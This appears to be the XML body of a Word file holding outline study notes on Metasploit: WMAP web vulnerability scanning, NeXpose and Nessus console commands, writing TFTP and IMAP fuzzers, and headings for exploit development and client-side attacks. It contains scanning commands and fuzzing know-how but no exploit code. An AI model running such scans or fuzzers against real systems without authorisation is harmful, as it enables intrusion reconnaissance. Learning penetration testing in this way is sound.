    <w:p w14:paraId="18B7BE14" w14:textId="6C81CD74" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web Application Scanning from the Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3DE1D" w14:textId="1CCDA569" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Scanning with WMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F5D7A" w14:textId="71B50259" w:rsidR="00E33426" w:rsidRDefault="00BD1DFE" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>load wmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48281302" w14:textId="7D22C00C" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>add new target with wmap_sites -a and wmap_sites -l will print out available targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E8538" w14:textId="27C4263E" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>add the site as a target with wmap_targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFBD25F" w14:textId="6B009E19" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>review with -l switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE1A59" w14:textId="49A01421" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use wmap_run command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31209D" w14:textId="348372CD" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-t switch lists modules that will be used to scan the remote system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D80335" w14:textId="386CE865" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run vulns to list details of any found vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB03BB4" w14:textId="26F2BFD9" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using NeXpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C9B49" w14:textId="30A6C14C" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NeXpose Vulnerability Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08525C07" w14:textId="437DC35B" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>save scan results in XML and import into Metasploit via db_import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC6548" w14:textId="17E2D868" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use vulns command to see what vulnerabilities were found by NeXpose scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494C0BB" w14:textId="018E738F" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use -p to specify port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F3F59D" w14:textId="2E1C96FF" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-s to specify service name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9809E" w14:textId="1399E4C3" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-i to specify vulnerability information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9CA22" w14:textId="03460ECA" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NeXpose via msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2044B" w14:textId="1A6DCDB3" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>load nexpose command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01790DE5" w14:textId="76362EED" w:rsidR="00BD1DFE" w:rsidRDefault="00BD1DFE" w:rsidP="00BD1DFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>connect to server using nexpose_connect command along with credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3434B" w14:textId="75163827" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nexpose_connect password:username&lt;ip&gt;:port ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70752966" w14:textId="1926FF75" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run scan with nexpose_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822F636" w14:textId="72261977" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use credentials with -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABCE43" w14:textId="4B9C381D" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>full-audit scan template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43217B9D" w14:textId="28B12A5B" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>check with hosts command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2BE4D" w14:textId="1667896B" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>then run services and vulns to see results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F9CA0" w14:textId="15258E76" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Expanding on our NeXpose Scanning Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD6FDA9" w14:textId="4F3130F2" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nexpose_discover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F8F7A" w14:textId="234628A1" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nexpose_dos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55916AF3" w14:textId="7BD10E72" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nexpose_exhaustive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E241943" w14:textId="1006DF4E" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Working with Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B16443" w14:textId="7B5B441F" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit will accept vulnerability scan result files from both Nessus and OpenVAS in nbe file format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77515976" w14:textId="2724CABC" w:rsidR="002F7C93" w:rsidRDefault="002F7C93" w:rsidP="002F7C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>import the results into the Metasploit Framework with db_import</w:t>
      </w:r>
      <w:r w:rsidR="00F6286B">
        <w:t xml:space="preserve"> /path/to/file.nbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49825B66" w14:textId="50704FAF" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run hosts command to list the hosts in nbe file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FADCB95" w14:textId="0C9570A2" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run services command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0EA156" w14:textId="31C19E08" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run vulns command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD857C5" w14:textId="1FE66F48" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>run search for any found vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647DC65" w14:textId="68C06E9A" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nessus via Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FF8FD" w14:textId="41E3D23B" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect to a Nessus server via Nessus Bridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0509CF" w14:textId="388E87EC" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>load nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0134DC" w14:textId="6A704ADC" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nessus_help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4D58D" w14:textId="70478273" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nessus_connect user:pass@IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02647263" w14:textId="51DF2A93" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nessus_policy_list command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79712470" w14:textId="65049362" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nessus_scan_new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B970A4A" w14:textId="46F31A4C" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nessus_scan_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7744B0A5" w14:textId="74ECCB6D" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To view completed reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45134D" w14:textId="00354D7F" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nessus_report_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAB690" w14:textId="7E377744" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>import a report with nessus_report_get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E7689C" w14:textId="1C2E823B" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>the run hosts -c address,vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F46C1EA" w14:textId="443F3D01" w:rsidR="00F6286B" w:rsidRDefault="00F6286B" w:rsidP="00F6286B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WRITING A SIMPLE FUZZER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49143903" w14:textId="0F51E68F" w:rsidR="00771977" w:rsidRDefault="00847D6E" w:rsidP="00771977">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fuzzer tools are used to provide invalid and unexpected data to the inputs of a program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406A502" w14:textId="682EDB09" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>typically for buffer overflow, invalid format strings, directory traversal attacks, command execution vulnerabilities, SQL Injection, XSS, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895C627" w14:textId="2D8D0B05" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploits Rex Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC8E2B" w14:textId="0B98CB4D" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rex::Text Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC04E9" w14:textId="475D1296" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Buffer conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EDB1C" w14:textId="7C31E39B" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5A154" w14:textId="6A3FA5DF" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Checksumming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB57F2" w14:textId="3C402C75" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Random String Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F65308" w14:textId="4EE79956" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>helpful for fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F24CFD" w14:textId="16F9EA75" w:rsidR="00847D6E" w:rsidRDefault="0005276B" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00847D6E" w:rsidRPr="007B5C51">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.rubydoc.info/github/rapid7/metasploit-framework/Rex/Text</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="729411CA" w14:textId="412B1B3B" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Simple TFTP Fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC075C9" w14:textId="2FA57AC3" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>rewriting pre-existing modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6345F4" w14:textId="267F9A4B" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Testing Fuzzer Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084EF8C1" w14:textId="77A3E737" w:rsidR="00847D6E" w:rsidRDefault="00847D6E" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Simple IMAP Fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA2775" w14:textId="23F8954F" w:rsidR="00847D6E" w:rsidRDefault="00CE17FE" w:rsidP="00847D6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Msf::Exploit::Remote::Imap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284B0B9" w14:textId="3EE90AC0" w:rsidR="00CE17FE" w:rsidRDefault="00CE17FE" w:rsidP="00CE17FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>overriding run() method and connect_login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E4830" w14:textId="4BBA72B4" w:rsidR="00CE17FE" w:rsidRDefault="00CE17FE" w:rsidP="00CE17FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Test IMAP Fuzzer Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF3EF4" w14:textId="7A24E292" w:rsidR="00CE17FE" w:rsidRDefault="00CE17FE" w:rsidP="00CE17FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>EXPLOIT DEVELOPMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74150488" w14:textId="336A2D66" w:rsidR="006D0073" w:rsidRDefault="006D0073" w:rsidP="006D0073">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WEB APP EXPLOIT DEVELOPMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C7108" w14:textId="787F981A" w:rsidR="006D0073" w:rsidRDefault="006D0073" w:rsidP="006D0073">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CLIENT-SIDE ATTACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69C106" w14:textId="32E76D65" w:rsidR="006D0073" w:rsidRDefault="00B21F2A" w:rsidP="006D0073">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Binary Payloads</w:t>
      </w:r>
    </w:p>
